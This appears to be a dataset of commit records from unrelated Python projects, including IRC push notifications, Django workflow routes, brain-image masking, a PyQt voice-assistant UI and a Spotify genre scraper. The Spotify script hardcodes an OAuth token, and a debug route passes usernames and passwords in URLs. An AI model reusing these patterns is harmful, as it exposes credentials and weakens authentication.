def read_and_parse_json(data_type):
sub_dir = os.path.join(data_dir, data_type)
def full_path(file_name):
return os.path.join(sub_dir, file_name)
def only_json(file_name):
return file_name.endswith('.json')
def load_json(json_file_name):
with open(json_file_name) as json_file:
return json.load(json_file)
return map(load_json, filter(only_json, map(full_path, os.listdir(sub_dir))))
@contract.accepts(str)
@contract.returns(dict)
def load_enum(struct_name):
def create_enum_map(enum_map, args):
enumeration, enum_type = args
enum_map[str(enum_type)] = enumeration
return enum_map
return reduce(create_enum_map, enumerate(read_and_parse_json(struct_name)[0]), {})
@contract.accepts(str)
@contract.returns(dict)
def load_struct(struct_name):
def create_struct_map(struct_map, struct_):
struct_map[str(struct_['name'])] = struct_
return struct_map
return reduce(create_struct_map, read_and_parse_json(struct_name), {})
| Python | 0 |
ecc21e3fccc41413686389735da93e0488779cc4 | Add a test command | pypush.py | pypush.py | # Simple Push Python Module
import znc
import re
import http.client, urllib
import traceback
class pypush(znc.Module):
module_types = [znc.CModInfo.UserModule]
description = "Push python3 module for ZNC"
def OnLoad(self, sArgs, sMessage):
self.nick = ''
self.debug = False
return znc.CONTINUE
def PutModuleDbg(self, s):
if self.debug:
self.PutModule(s)
def PushMsg(self, title, msg):
self.PutModuleDbg("{0} -- {1}".format(title, msg))
conn = http.client.HTTPSConnection("api.pushover.net:443")
conn.request("POST", "/1/messages.json",
urllib.parse.urlencode({
"token": self.nv['token'],
"user": self.nv['user'],
"title": title,
"message": msg,
}), { "Content-type": "application/x-www-form-urlencoded" })
conn.getresponse()
def Highlight(self, message):
if self.nick != self.GetNetwork().GetCurNick():
self.nick = self.GetNetwork().GetCurNick()
words = [self.nick, ] + self.nv['highlight'].split()
self.HighlightRE = re.compile(r'\b({0})\b'.format('|'.join(words)), flags=re.IGNORECASE).search
return self.HighlightRE(message)
def OnChanMsg(self, nick, channel, message):
if self.Highlight(message.s):
self.PushMsg("Highlight", "{0}: [{1}] {2}".format(channel.GetName(), nick.GetNick(), message.s))
return znc.CONTINUE
def OnPrivMsg(self, nick, message):
self.PushMsg("Private", "[{0}] {1}".format(nick.GetNick(), message.s))
return znc.CONTINUE
def OnModCommand(self, commandstr):
argv = commandstr.split()
try:
self.PutModule("Command!! {0}".format(argv))
method = getattr(self, "DoCommand_" + argv[0].replace('-','_').lower(), self.DoCommandNotUnderstood)
method(argv)
except Exception:
self.PutModule("Command Exception!! {0} -> {1}".format(argv, traceback.format_exc()))
return znc.CONTINUE
def DoCommandNotUnderstood(self, argv):
self.PutModule("Command Not Understood: {0}".format(argv))
def DoCommand_setuser(self, argv):
try:
self.nv['user'] = argv[1]
self.PutModule("Pushover user set")
except Exception:
self.PutModule("SetUser requires a Pushover user string");
def DoCommand_settoken(self, argv):
try:
self.nv['token'] = argv[1]
self.PutModule("Pushover token set")
except Exception:
self.PutModule("SetToken requires a Pushover token string");
def DoCommand_sethighlight(self, argv):
self.nv['highlight'] = ' '.join(argv[1:])
self.nick = '' # unset the nick to regenerate the re
def DoCommand_debug(self, argv):
self.debug = not self.debug
self.PutModule("Debug {0}".format(self.debug));
def DoCommand_test(self, argv):
self.PushMsg("Test", "{0}".format(' '.join(argv[0:])))
return znc.CONTINUE
| # Simple Push Python Module
import znc
import re
import http.client, urllib
import traceback
class pypush(znc.Module):
module_types = [znc.CModInfo.UserModule]
description = "Push python3 module for ZNC"
def OnLoad(self, sArgs, sMessage):
self.nick = ''
self.debug = False
return znc.CONTINUE
def PutModuleDbg(self, s):
if self.debug:
self.PutModule(s)
def PushMsg(self, title, msg):
self.PutModuleDbg("{0} -- {1}".format(title, msg))
conn = http.client.HTTPSConnection("api.pushover.net:443")
conn.request("POST", "/1/messages.json",
urllib.parse.urlencode({
"token": self.nv['token'],
"user": self.nv['user'],
"title": title,
"message": msg,
}), { "Content-type": "application/x-www-form-urlencoded" })
conn.getresponse()
def Highlight(self, message):
if self.nick != self.GetNetwork().GetCurNick():
self.nick = self.GetNetwork().GetCurNick()
words = [self.nick, ] + self.nv['highlight'].split()
self.HighlightRE = re.compile(r'\b({0})\b'.format('|'.join(words)), flags=re.IGNORECASE).search
return self.HighlightRE(message)
def OnChanMsg(self, nick, channel, message):
if self.Highlight(message.s):
self.PushMsg("Highlight", "{0}: [{1}] {2}".format(channel.GetName(), nick.GetNick(), message.s))
return znc.CONTINUE
def OnPrivMsg(self, nick, message):
self.PushMsg("Private", "[{0}] {1}".format(nick.GetNick(), message.s))
return znc.CONTINUE
def OnModCommand(self, commandstr):
argv = commandstr.split()
try:
self.PutModule("Command!! {0}".format(argv))
method = getattr(self, "DoCommand_" + argv[0].replace('-','_').lower(), self.DoCommandNotUnderstood)
method(argv)
except Exception:
self.PutModule("Command Exception!! {0} -> {1}".format(argv, traceback.format_exc()))
return znc.CONTINUE
def DoCommandNotUnderstood(self, argv):
self.PutModule("Command Not Understood: {0}".format(argv))
def DoCommand_setuser(self, argv):
try:
self.nv['user'] = argv[1]
self.PutModule("Pushover user set")
except Exception:
self.PutModule("SetUser requires a Pushover user string");
def DoCommand_settoken(self, argv):
try:
self.nv['token'] = argv[1]
self.PutModule("Pushover token set")
except Exception:
self.PutModule("SetToken requires a Pushover token string");
def DoCommand_sethighlight(self, argv):
self.nv['highlight'] = ' '.join(argv[1:])
self.nick = '' # unset the nick to regenerate the re
def DoCommand_debug(self, argv):
self.debug = not self.debug
self.PutModule("Debug {0}".format(self.debug));
| Python | 0.000797 |
9d74f2ebfc0a635026544a977380593e90b4150d | upgrade (goflow.workflow indepency) | leavedemo/urls.py | leavedemo/urls.py | from django.conf.urls.defaults import *
from django.conf import settings
from leave.forms import StartRequestForm, RequesterForm, CheckRequestForm
from os.path import join, dirname
_dir = join(dirname(__file__))
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
# FOR DEBUG AND TEST ONLY
(r'^.*/accounts/login.*switch/(?P<username>.*)/(?P<password>.*)/$', 'goflow.workflow.views.debug_switch_user', {'redirect':'/leave/'}),
(r'^.*/switch/(?P<username>.*)/(?P<password>.*)/$', 'goflow.workflow.views.debug_switch_user'),
# user connection
(r'^.*/logout/$', 'django.contrib.auth.views.logout'),
(r'^.*/accounts/login/$', 'django.contrib.auth.views.login', {'template_name':'goflow/login.html'}),
(r'^.*/password_change/$', 'django.contrib.auth.views.password_change'),
# static
(r'^images/(?P<path>.*)$', 'django.views.static.serve', {'document_root': join(_dir, 'media/img'), 'show_indexes': True}),
(r'^files/(.*)$', 'django.views.static.serve', {'document_root': settings.MEDIA_ROOT}),
# home redirection
(r'^.*/home/$', 'django.views.generic.simple.redirect_to', {'url':'/leave/'}),
# home page
(r'^leave/$', 'django.views.generic.simple.direct_to_template', {'template':'leave.html'}),
# starting application
(r'^leave/start/$', 'goflow.apptools.views.start_application', {'process_name':'leave',
'form_class':StartRequestForm,
'template':'start_leave.html'}),
# applications
(r'^leave/checkstatus/(?P<id>.*)/$', 'goflow.apptools.views.edit_model', {'form_class':CheckRequestForm,
'template':'checkstatus.html'}),
(r'^leave/checkstatus_auto/$', 'leavedemo.leave.views.checkstatus_auto', {'notif_user':True}),
(r'^leave/refine/(?P<id>.*)/$', 'goflow.apptools.views.edit_model', {'form_class':RequesterForm,
'template':'refine.html'}),
(r'^leave/approvalform/(?P<id>.*)/$', 'goflow.apptools.views.edit_model', {'form_class':CheckRequestForm,
'template':'approval.html'}),
(r'^leave/hrform/(?P<id>.*)/$', 'goflow.apptools.views.view_application', {'template':'hrform.html'}),
(r'^leave/hr_auto/$', 'leavedemo.leave.auto.update_hr'),
(r'^leave/finalinfo/(?P<id>.*)/$', 'goflow.apptools.views.view_application', {'template':'finalinfo.html'}),
# administration
(r'^leave/admin/workflow/', include('goflow.apptools.urls_admin')),
(r'^leave/admin/graphics2/', include('goflow.graphics2.urls_admin')),
(r'^leave/admin/(.*)', admin.site.root),
# Goflow pages
(r'^leave/', include('goflow.urls')),
(r'^leave/send_mail/$', 'goflow.workflow.notification.send_mail'),
)
| from django.conf.urls.defaults import *
from django.conf import settings
from leave.forms import StartRequestForm, RequesterForm, CheckRequestForm
from os.path import join, dirname
_dir = join(dirname(__file__))
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
# FOR DEBUG AND TEST ONLY
(r'^.*/accounts/login.*switch/(?P<username>.*)/(?P<password>.*)/$', 'goflow.workflow.views.debug_switch_user', {'redirect':'/leave/'}),
(r'^.*/switch/(?P<username>.*)/(?P<password>.*)/$', 'goflow.workflow.views.debug_switch_user'),
# user connection
(r'^.*/logout/$', 'django.contrib.auth.views.logout'),
(r'^.*/accounts/login/$', 'django.contrib.auth.views.login', {'template_name':'goflow/login.html'}),
(r'^.*/password_change/$', 'django.contrib.auth.views.password_change'),
# static
(r'^images/(?P<path>.*)$', 'django.views.static.serve', {'document_root': join(_dir, 'media/img'), 'show_indexes': True}),
(r'^files/(.*)$', 'django.views.static.serve', {'document_root': settings.MEDIA_ROOT}),
# home redirection
(r'^.*/home/$', 'django.views.generic.simple.redirect_to', {'url':'/leave/'}),
# home page
(r'^leave/$', 'django.views.generic.simple.direct_to_template', {'template':'leave.html'}),
# starting application
(r'^leave/start/$', 'goflow.apptools.views.start_application', {'process_name':'leave',
'form_class':StartRequestForm,
'template':'start_leave.html'}),
# applications
(r'^leave/checkstatus/(?P<id>.*)/$', 'goflow.apptools.views.edit_model', {'form_class':CheckRequestForm,
'template':'checkstatus.html'}),
(r'^leave/checkstatus_auto/$', 'leavedemo.leave.views.checkstatus_auto', {'notif_user':True}),
(r'^leave/refine/(?P<id>.*)/$', 'goflow.apptools.views.edit_model', {'form_class':RequesterForm,
'template':'refine.html'}),
(r'^leave/approvalform/(?P<id>.*)/$', 'goflow.apptools.views.edit_model', {'form_class':CheckRequestForm,
'template':'approval.html'}),
(r'^leave/hrform/(?P<id>.*)/$', 'goflow.apptools.views.view_application', {'template':'hrform.html'}),
(r'^leave/hr_auto/$', 'leavedemo.leave.auto.update_hr'),
(r'^leave/finalinfo/(?P<id>.*)/$', 'goflow.apptools.views.view_application', {'template':'finalinfo.html'}),
# administration
(r'^leave/admin/workflow/', include('goflow.urls_admin')),
(r'^leave/admin/graphics2/', include('goflow.graphics2.urls_admin')),
(r'^leave/admin/(.*)', admin.site.root),
# Goflow pages
(r'^leave/', include('goflow.urls')),
(r'^leave/send_mail/$', 'goflow.workflow.notification.send_mail'),
)
| Python | 0 |
1df66cc442e93d85fd8a8bbab2815574387a8952 | Remove print | doc/examples/brain_extraction_dwi.py | doc/examples/brain_extraction_dwi.py | """
=================================================
Brain segmentation with dipy.segment.mask.
=================================================
We show how to extract brain information and mask from a b0 image using dipy's
segment.mask module.
First import the necessary modules:
"""
import os.path
import numpy as np
import nibabel as nib
"""
Download and read the data for this tutorial.
The scil_b0 dataset contains different data from different companies and models.
For this example, the data comes from a 3 tesla GE MRI.
"""
from dipy.data import fetch_scil_b0, read_scil_b0
fetch_scil_b0()
img = read_scil_b0()
data = np.squeeze(img.get_data())
"""
img contains a nibabel Nifti1Image object. Data is the actual brain data as a
numpy ndarray.
Segment the brain using dipy's mask module.
`medostu` returns the segmented brain data an a binary mask of the brain.
It is possible to fine tune the `medotsu`'s parameters (median_radius and
num_pass) if extraction yields incorrect results but the default parameters work
well on most volumes. For this example, default parameters (4, 4) will be used.
"""
from dipy.segment.mask import medotsu
b0_mask, mask = medotsu(data.copy(), 4, 4)
"""
Saving the segmentation results is very easy using nibabel. We need the b0_mask,
and the binary mask volumes. The affine matrix which transform the image's
coordinates to the world coordinates is also needed. Here, we choose to save
both images in float32.
"""
mask_img = nib.Nifti1Image(mask.astype(np.float32), img.get_affine())
b0_img = nib.Nifti1Image(b0_mask.astype(np.float32), img.get_affine())
fname = './ge_3t'
nib.save(mask_img, fname+'_binary_mask.nii.gz')
nib.save(b0_img, fname+'_mask.nii.gz')
"""
Quick view of the results middle slice using matplotlib.
"""
import matplotlib.pyplot as plt
slice = data.shape[2]/2
plt.figure('Brain segmentation')
plt.subplot(1,2,1)
plt.imshow(data[:,:,slice])
plt.subplot(1,2,2)
plt.imshow(b0_mask[:,:,slice])
plt.show()
"""
`medostu` can also automaticaly crop the outputs to remove the largest possible
number of backgroud voxels. This makes outputted data significantly smaller.
`medostu`'s auto cropping is activated by setting the autocrop parameter to True.
"""
b0_mask_crop, mask_crop = medotsu(data.copy(), 4, 4, autocrop=True)
"""
Saving cropped data using nibabel as demonstrated previously.
"""
mask_img_crop = nib.Nifti1Image(mask_crop.astype(np.float32), img.get_affine())
b0_img_crop = nib.Nifti1Image(b0_mask_crop.astype(np.float32), img.get_affine())
nib.save(mask_img_crop, fname+'_binary_mask_crop.nii.gz')
nib.save(b0_img_crop, fname+'_mask_crop.nii.gz')
| """
=================================================
Brain segmentation with dipy.segment.mask.
=================================================
We show how to extract brain information and mask from a b0 image using dipy's
segment.mask module.
First import the necessary modules:
"""
import os.path
import numpy as np
import nibabel as nib
"""
Download and read the data for this tutorial.
The scil_b0 dataset contains different data from different companies and models.
For this example, the data comes from a 3 tesla GE MRI.
"""
from dipy.data import fetch_scil_b0, read_scil_b0
fetch_scil_b0()
img = read_scil_b0()
data = np.squeeze(img.get_data())
"""
img contains a nibabel Nifti1Image object. Data is the actual brain data as a
numpy ndarray.
Segment the brain using dipy's mask module.
`medostu` returns the segmented brain data an a binary mask of the brain.
It is possible to fine tune the `medotsu`'s parameters (median_radius and
num_pass) if extraction yields incorrect results but the default parameters work
well on most volumes. For this example, default parameters (4, 4) will be used.
"""
print('Segmenting brain data from GE 3T b0 volume...')
from dipy.segment.mask import medotsu
b0_mask, mask = medotsu(data.copy(), 4, 4)
"""
Saving the segmentation results is very easy using nibabel. We need the b0_mask,
and the binary mask volumes. The affine matrix which transform the image's
coordinates to the world coordinates is also needed. Here, we choose to save
both images in float32.
"""
mask_img = nib.Nifti1Image(mask.astype(np.float32), img.get_affine())
b0_img = nib.Nifti1Image(b0_mask.astype(np.float32), img.get_affine())
fname = './ge_3t'
nib.save(mask_img, fname+'_binary_mask.nii.gz')
nib.save(b0_img, fname+'_mask.nii.gz')
"""
Quick view of the results middle slice using matplotlib.
"""
import matplotlib.pyplot as plt
slice = data.shape[2]/2
plt.figure('Brain segmentation')
plt.subplot(1,2,1)
plt.imshow(data[:,:,slice])
plt.subplot(1,2,2)
plt.imshow(b0_mask[:,:,slice])
plt.show()
"""
`medostu` can also automaticaly crop the outputs to remove the largest possible
number of backgroud voxels. This makes outputted data significantly smaller.
`medostu`'s auto cropping is activated by setting the autocrop parameter to True.
"""
b0_mask_crop, mask_crop = medotsu(data.copy(), 4, 4, autocrop=True)
"""
Saving cropped data using nibabel as demonstrated previously.
"""
mask_img_crop = nib.Nifti1Image(mask_crop.astype(np.float32), img.get_affine())
b0_img_crop = nib.Nifti1Image(b0_mask_crop.astype(np.float32), img.get_affine())
nib.save(mask_img_crop, fname+'_binary_mask_crop.nii.gz')
nib.save(b0_img_crop, fname+'_mask_crop.nii.gz')
| Python | 0.000016 |
51b716cc00efd0d0c93ffc11f4cd7242446bad88 | Remove unused pyrax import | nodes/management/commands/create_images.py | nodes/management/commands/create_images.py | from gevent import monkey
monkey.patch_all()
import gevent
import os
from django.core.management import BaseCommand
from django.conf import settings
from ...utils import connect_to_node, logger
class Command(BaseCommand):
help = 'create nodes images'
def handle(self, *args, **kwargs):
self._root = os.path.join(settings.PROJECT_ROOT, 'nodes', 'images')
self._create_image('raw')
tasks = [
gevent.spawn(self._create_image, image, image_name='raw')
for image in os.listdir(self._root) if image != 'raw'
]
gevent.joinall(tasks)
def _create_image(self, name, **kwargs):
"""Create image"""
image_root = os.path.join(self._root, name)
with connect_to_node(**kwargs) as node:
node.put(image_root, '/root/{name}/'.format(name=name))
out = node.execute('''
cd /root/{name}/
bash bootstrap.sh
'''.format(name=name))
logger.info(out.stdout)
logger.info(out.stderr)
node.save_image(name)
| from gevent import monkey
monkey.patch_all()
import gevent
import os
from django.core.management import BaseCommand
from django.conf import settings
from ...utils import connect_to_node, logger, pyrax
class Command(BaseCommand):
help = 'create nodes images'
def handle(self, *args, **kwargs):
self._root = os.path.join(settings.PROJECT_ROOT, 'nodes', 'images')
self._create_image('raw')
tasks = [
gevent.spawn(self._create_image, image, image_name='raw')
for image in os.listdir(self._root) if image != 'raw'
]
gevent.joinall(tasks)
def _create_image(self, name, **kwargs):
"""Create image"""
image_root = os.path.join(self._root, name)
with connect_to_node(**kwargs) as node:
node.put(image_root, '/root/{name}/'.format(name=name))
out = node.execute('''
cd /root/{name}/
bash bootstrap.sh
'''.format(name=name))
logger.info(out.stdout)
logger.info(out.stderr)
node.save_image(name)
| Python | 0 |
9ca88c5cd7f52c6f064a1d5edb003471f6223a74 | Change lable on click | Winston.py | Winston.py | import sys
from PyQt4.QtGui import *
#from PyQt4.QtWidgets import *
from PyQt4.QtCore import *
from core.Messenger import *
from core.Events import *
from alexa import AlexaService
class QTApp(QWidget):
def __init__(self):
super(QWidget, self).__init__()
self.title = 'Winston'
self.setWindowTitle(self.title)
self.setGeometry(100,100,800,400)
self.btn = QPushButton('', self)
self.alexaService = AlexaService()
self.messenger = getMessenger()
self.initUI()
def initUI(self):
self.label = QLabel(self)
self.label.setText("Hi, I am Winston. How can I help you?")
self.label.move(50,40)
self.btn.setCheckable(True)
self.btn.setIcon(QIcon('media/Alexa_passive.jpg'))
self.btn.setIconSize(QSize(150,150))
self.btn.setObjectName("Alexa")
self.btn.move(100,70)
self.btn.pressed.connect(self.on_press)
self.btn.released.connect(self.on_release)
self.btn.clicked.connect(self.on_click)
self.bool = False
self.show()
@pyqtSlot()
def on_click(self):
sending_button = self.sender()
# TODO
if not self.bool:
self.label.setText('listening ...')
self.bool = True
else:
self.label.setText("Hi, I am Winston. How can I help you?")
self.bool = False
data = {'App': str(sending_button.objectName())}
self.messenger.postEvent(Events.UI_BTN_CLICKED, data)
@pyqtSlot()
def on_press(self):
sending_button = self.sender()
data = {'App': str(sending_button.objectName())}
self.btn.setIcon(QIcon('media/Alexa_active.jpg'))
self.btn.setCheckable(False);
self.messenger.postEvent(Events.UI_BTN_PRESSED, data)
@pyqtSlot()
def on_release(self):
sending_button = self.sender()
data = {'App': str(sending_button.objectName())}
self.btn.setIcon(QIcon('media/Alexa_passive.jpg'))
self.btn.setCheckable(True);
self.messenger.postEvent(Events.UI_BTN_RELEASED, data)
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = QTApp()
app.exec_()
delMessenger()
sys.exit()
| import sys
from PyQt4.QtGui import *
#from PyQt4.QtWidgets import *
from PyQt4.QtCore import *
from core.Messenger import *
from core.Events import *
from alexa import AlexaService
class QTApp(QWidget):
def __init__(self):
super(QWidget, self).__init__()
self.title = 'Winston'
self.setWindowTitle(self.title)
self.setGeometry(100,100,800,400)
self.btn = QPushButton('', self)
self.alexaService = AlexaService()
self.messenger = getMessenger()
self.initUI()
def initUI(self):
b = QLabel(self)
b.setText("Hi, I am Winston. How can I help you?")
b.move(50,40)
self.btn.setCheckable(True)
self.btn.setIcon(QIcon('media/Alexa_passive.jpg'))
self.btn.setIconSize(QSize(150,150))
self.btn.setObjectName("Alexa")
self.btn.move(100,70)
self.btn.pressed.connect(self.on_press)
self.btn.released.connect(self.on_release)
self.btn.clicked.connect(self.on_click)
self.show()
@pyqtSlot()
def on_click(self):
sending_button = self.sender()
data = {'App': str(sending_button.objectName())}
self.messenger.postEvent(Events.UI_BTN_CLICKED, data)
@pyqtSlot()
def on_press(self):
sending_button = self.sender()
data = {'App': str(sending_button.objectName())}
self.btn.setIcon(QIcon('media/Alexa_active.jpg'))
self.btn.setCheckable(False);
self.messenger.postEvent(Events.UI_BTN_PRESSED, data)
@pyqtSlot()
def on_release(self):
sending_button = self.sender()
data = {'App': str(sending_button.objectName())}
self.btn.setIcon(QIcon('media/Alexa_passive.jpg'))
self.btn.setCheckable(True);
self.messenger.postEvent(Events.UI_BTN_RELEASED, data)
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = QTApp()
app.exec_()
delMessenger()
sys.exit()
| Python | 0 |
2f31a1f0745214c2b06dadc1258926f7440d429f | Set datetime output format to ISO8601 | abe/app.py | abe/app.py | #!/usr/bin/env python3
"""Main flask app"""
from flask import Flask, render_template, jsonify
from flask_restful import Api
from flask_cors import CORS
from flask_sslify import SSLify # redirect to https
from flask.json import JSONEncoder
from datetime import datetime
import os
import logging
FORMAT = "%(levelname)s:ABE: _||_ %(message)s"
logging.basicConfig(level=logging.DEBUG, format=FORMAT)
from .resource_models.event_resources import EventApi
from .resource_models.label_resources import LabelApi
from .resource_models.ics_resources import ICSApi
app = Flask(__name__)
CORS(app)
SSLify(app)
api = Api(app)
class CustomJSONEncoder(JSONEncoder):
def default(self, obj):
if isinstance(obj, datetime):
return obj.isoformat()
else:
return JSONEncoder.default(self, obj)
app.json_encoder = CustomJSONEncoder
# add return representations
@api.representation('application/json')
def output_json(data, code, headers=None):
resp = jsonify(data)
resp.status_code = code
resp.headers.extend(headers or {})
return resp
# Route resources
api.add_resource(EventApi, '/events/', methods=['GET', 'POST'], endpoint='event')
api.add_resource(EventApi, '/events/<string:event_id>', methods=['GET', 'PUT', 'PATCH', 'DELETE'], endpoint='event_id') # TODO: add route for string/gphycat links
api.add_resource(EventApi, '/events/<string:event_id>/<string:rec_id>', methods=['GET', 'PUT', 'PATCH', 'DELETE'], endpoint='rec_id') # TODO: add route for string/gphycat links
api.add_resource(LabelApi, '/labels/', methods=['GET', 'POST'], endpoint='label')
api.add_resource(LabelApi, '/labels/<string:label_name>', methods=['GET', 'PUT', 'PATCH', 'DELETE'], endpoint='label_name')
api.add_resource(ICSApi, '/ics/', methods=['GET', 'POST'], endpoint='ics')
api.add_resource(ICSApi, '/ics/<string:ics_name>', methods=['GET', 'PUT', 'PATCH', 'DELETE'], endpoint='ics_name')
@app.route('/')
def splash():
return render_template('splash.html')
@app.route('/add_event')
def add_event():
return render_template('add_event.html')
@app.route('/add_label')
def add_label():
return render_template('add_label.html')
if __name__ == '__main__':
app.debug = os.getenv('FLASK_DEBUG') != 'False' # updates the page as the code is saved
HOST = '0.0.0.0' if 'PORT' in os.environ else '127.0.0.1'
PORT = int(os.environ.get('PORT', 3000))
app.run(host='0.0.0.0', port=PORT)
| #!/usr/bin/env python3
"""Main flask app"""
from flask import Flask, render_template, jsonify
from flask_restful import Api
from flask_cors import CORS
from flask_sslify import SSLify # redirect to https
import os
import logging
FORMAT = "%(levelname)s:ABE: _||_ %(message)s"
logging.basicConfig(level=logging.DEBUG, format=FORMAT)
from .resource_models.event_resources import EventApi
from .resource_models.label_resources import LabelApi
from .resource_models.ics_resources import ICSApi
app = Flask(__name__)
CORS(app)
SSLify(app)
api = Api(app)
# add return representations
@api.representation('application/json')
def output_json(data, code, headers=None):
resp = jsonify(data)
resp.status_code = code
resp.headers.extend(headers or {})
return resp
# Route resources
api.add_resource(EventApi, '/events/', methods=['GET', 'POST'], endpoint='event')
api.add_resource(EventApi, '/events/<string:event_id>', methods=['GET', 'PUT', 'PATCH', 'DELETE'], endpoint='event_id') # TODO: add route for string/gphycat links
api.add_resource(EventApi, '/events/<string:event_id>/<string:rec_id>', methods=['GET', 'PUT', 'PATCH', 'DELETE'], endpoint='rec_id') # TODO: add route for string/gphycat links
api.add_resource(LabelApi, '/labels/', methods=['GET', 'POST'], endpoint='label')
api.add_resource(LabelApi, '/labels/<string:label_name>', methods=['GET', 'PUT', 'PATCH', 'DELETE'], endpoint='label_name')
api.add_resource(ICSApi, '/ics/', methods=['GET', 'POST'], endpoint='ics')
api.add_resource(ICSApi, '/ics/<string:ics_name>', methods=['GET', 'PUT', 'PATCH', 'DELETE'], endpoint='ics_name')
@app.route('/')
def splash():
return render_template('splash.html')
@app.route('/add_event')
def add_event():
return render_template('add_event.html')
@app.route('/add_label')
def add_label():
return render_template('add_label.html')
if __name__ == '__main__':
app.debug = os.getenv('FLASK_DEBUG') != 'False' # updates the page as the code is saved
HOST = '0.0.0.0' if 'PORT' in os.environ else '127.0.0.1'
PORT = int(os.environ.get('PORT', 3000))
app.run(host='0.0.0.0', port=PORT)
| Python | 0.999999 |
ba1494afb962fb8fba84e306cfb4c26a83602b6d | update license | drink.py | drink.py | # -*- coding: utf-8 -*-
import os
from server import app, db
import server.model
if __name__ == "__main__":
db.create_all()
app.run(debug=True) # host='10.10.56.190')
| # -*- coding: utf-8 -*-
"""
Copyright (C) 2014 Chuck Housley
This work is free. You can redistribute it and/or modify it under the
terms of the Do What The Fuck You Want To Public License, Version 2,
as published by Sam Hocevar. See the COPYING file for more details.
"""
import os
from server import app, db
import server.model
if __name__ == "__main__":
db.create_all()
app.run(debug=True) # host='10.10.56.190')
| Python | 0 |
6b56ab963f46ac45caf0a2f3391fdedf9dfabb39 | Fix python2 compatibility | create_dataset.py | create_dataset.py | from __future__ import print_function
import os
import shutil
import spotipy
import pickle
import pandas as pd
import numpy as np
from collections import Counter
if not os.path.exists("genres.p"):
# Login to Spotify and get your OAuth token:
# https://developer.spotify.com/web-api/search-item/
AUTH = "BQBHlFpkjjlfDwbyQ7v0F1p_cejpmYARG6KDclVlP3HZyb4MG3_Mc40tE__HsuFXGQvYRvOi1Mbfx-_FoA9DVXCpNupL0X8XFFbL1XghQCf6mH_yXc82GqWAtrLjUtc-eWIDBpci1M0"
if not os.path.exists('clean_midi'):
# Download the 'Clean MIDI' dataset from http://colinraffel.com/projects/lmd/
import urllib.request
import io
import gzip
FILE_URL = 'http://hog.ee.columbia.edu/craffel/lmd/clean_midi.tar.gz'
response = urllib.request.urlopen(FILE_URL)
compressed_file = io.BytesIO(response.read())
decompressed_file = gzip.GzipFile(fileobj=compressed_file)
with open(OUTFILE_PATH, 'wb') as outfile:
outfile.write(decompressed_file.read())
# Get artists from folder names
artists = [item for item in os.listdir(
'clean_midi') if not item.startswith('.')]
sp = spotipy.Spotify(auth=AUTH)
genres = {}
for i, artist in enumerate(artists):
try:
results = sp.search(q=artist, type='artist', limit=1)
items = results['artists']['items']
genre_list = items[0]['genres'] if len(items) else items['genres']
genres[artist] = genre_list
if i < 5:
print(artist, genre_list[:5])
except Exception as e:
print(artist, e)
# Save to pickle file
pickle.dump(genres, open("genres.p", "wb"), protocol=2)
else:
# Load genres meta-data
genres = pickle.load(open("genres.p", "rb"))
# Get the most common genres
flattened_list = [item for sublist in list(
genres.values()) for item in sublist]
MIDI_DIR = os.path.join(os.getcwd(), 'clean_midi')
def get_artists(genre):
"""Get artists with label `genre`."""
artists = [artist for artist, gs in genres.items() if genre in gs]
return artists
# Get artist with genres 'soft rock' and 'disco'
genre_data = {}
metal = get_artists('metal')
classical = get_artists('classical')
genre_data['metal'] = metal
genre_data['classical'] = classical
# Copy artists to a genre-specific folder
for genre, artists in genre_data.items():
try:
for artist in artists:
shutil.copytree(os.path.join(MIDI_DIR, artist), os.path.join(
os.getcwd(), 'subsets', genre, artist))
except Exception as e:
print(e)
| import os
import shutil
import spotipy
import pickle
import pandas as pd
import numpy as np
from collections import Counter
if not os.path.exists("genres.p"):
# Login to Spotify and get your OAuth token:
# https://developer.spotify.com/web-api/search-item/
AUTH = "BQBHlFpkjjlfDwbyQ7v0F1p_cejpmYARG6KDclVlP3HZyb4MG3_Mc40tE__HsuFXGQvYRvOi1Mbfx-_FoA9DVXCpNupL0X8XFFbL1XghQCf6mH_yXc82GqWAtrLjUtc-eWIDBpci1M0"
if not os.path.exists('clean_midi'):
# Download the 'Clean MIDI' dataset from http://colinraffel.com/projects/lmd/
import urllib.request
import io
import gzip
FILE_URL = 'http://hog.ee.columbia.edu/craffel/lmd/clean_midi.tar.gz'
response = urllib.request.urlopen(FILE_URL)
compressed_file = io.BytesIO(response.read())
decompressed_file = gzip.GzipFile(fileobj=compressed_file)
with open(OUTFILE_PATH, 'wb') as outfile:
outfile.write(decompressed_file.read())
# Get artists from folder names
artists = [item for item in os.listdir(
'clean_midi') if not item.startswith('.')]
sp = spotipy.Spotify(auth=AUTH)
genres = {}
for i, artist in enumerate(artists):
try:
results = sp.search(q=artist, type='artist', limit=1)
items = results['artists']['items']
genre_list = items[0]['genres'] if len(items) else items['genres']
genres[artist] = genre_list
if i < 5:
print(artist, genre_list[:5])
except Exception as e:
print(artist, e)
# Save to pickle file
pickle.dump(genres, open("genres.p", "wb"))
else:
# Load genres meta-data
genres = pickle.load(open("genres.p", "rb"))
# Get the most common genres
flattened_list = [item for sublist in list(
genres.values()) for item in sublist]
MIDI_DIR = os.path.join(os.getcwd(), 'clean_midi')
def get_artists(genre):
"""Get artists with label `genre`."""
artists = [artist for artist, gs in genres.items() if genre in gs]
return artists
# Get artist with genres 'soft rock' and 'disco'
genre_data = {}
metal = get_artists('metal')
classical = get_artists('classical')
genre_data['metal'] = metal
genre_data['classical'] = classical
# Copy artists to a genre-specific folder
for genre, artists in genre_data.items():
try:
for artist in artists:
shutil.copytree(os.path.join(MIDI_DIR, artist), os.path.join(
os.getcwd(), 'subsets', genre, artist))
except Exception as e:
print(e)
| Python | 0.000303 |
1b726978e1604269c8c4d2728a6f7ce774e5d16d | Fix edit control assessment modal | src/ggrc/models/control_assessment.py | src/ggrc/models/control_assessment.py | # Copyright (C) 2015 Google Inc., authors, and contributors <see AUTHORS file>
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
# Created By: anze@reciprocitylabs.com
# Maintained By: anze@reciprocitylabs.com
from ggrc import db
from .mixins import (
deferred, BusinessObject, Timeboxed, CustomAttributable, TestPlanned
)
from .object_document import Documentable
from .object_owner import Ownable
from .object_person import Personable
from .relationship import Relatable
from .track_object_state import HasObjectState, track_state_for_class
from ggrc.models.reflection import PublishOnly
class ControlAssessment(HasObjectState, TestPlanned, CustomAttributable,
Documentable, Personable, Timeboxed, Ownable,
